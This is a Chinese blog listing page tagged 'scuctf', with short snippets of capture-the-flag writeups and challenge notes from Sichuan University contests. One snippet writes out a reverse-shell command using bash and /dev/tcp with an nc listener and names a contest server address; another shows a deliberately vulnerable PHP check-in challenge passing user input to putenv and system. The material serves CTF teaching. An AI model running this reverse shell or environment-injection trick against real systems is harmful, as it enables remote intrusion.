scuctf

[SCUCTF2022]校赛Web出题笔记

前言本次校赛我出了两个题,一个签到一个中等,由于自己的原因导致这两道题都出现了比较离谱的非预期,这里给师傅们谢罪了。checkin$v){putenv("{$k}={$v}");}system("bash-c'snakin'");foreach($_GET["env"]as$k=>$v){putenv("{$k}");}}?>考点有两个:弱类型绕过和环境变量注入绕过1:三元运算这⾥直接⽤了high
Snakin_ya·2022-07-05 18:31

SCUCTF

SCUCTFREre1拖进ida里一看就出来了但是提交的时候答案是SCUCTF{}。。。。。。没搞懂为啥,害得我调试了半天re2程序加壳了直接脱了后看伪代码//第一次写的时候没脱壳。。。
皮三宝·2020-08-05 19:20

SCUCTF2020部分writeup

SCUCTF2020部分writeupMISC专业团队binwalk-eDaning.png提取出word文档scuctf{19cc63ff-50b9-4254-a997-89d613290918}记录参考链接
东坡何罪发文章总是审核不通过,去博客园了·2020-08-05 17:38

2018 SCUCTF web题:cat?非常规题解

主要思路1.寻找可以写入的目录2.通过>构造文件名,在通过ls-th>g将命令写入文件3.通过bash-i>&/dev/tcp/你的公网ip/监听的端口0>&1构造反弹shell4.在服务器使用"nc-lnvp相应端口"python脚本如下#-*-coding:utf8-*-importrequestsimporttimeurl='http://120.78.66.77:87/exec.php't
东坡何罪·2018-12-19 21:57
上一页 1 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他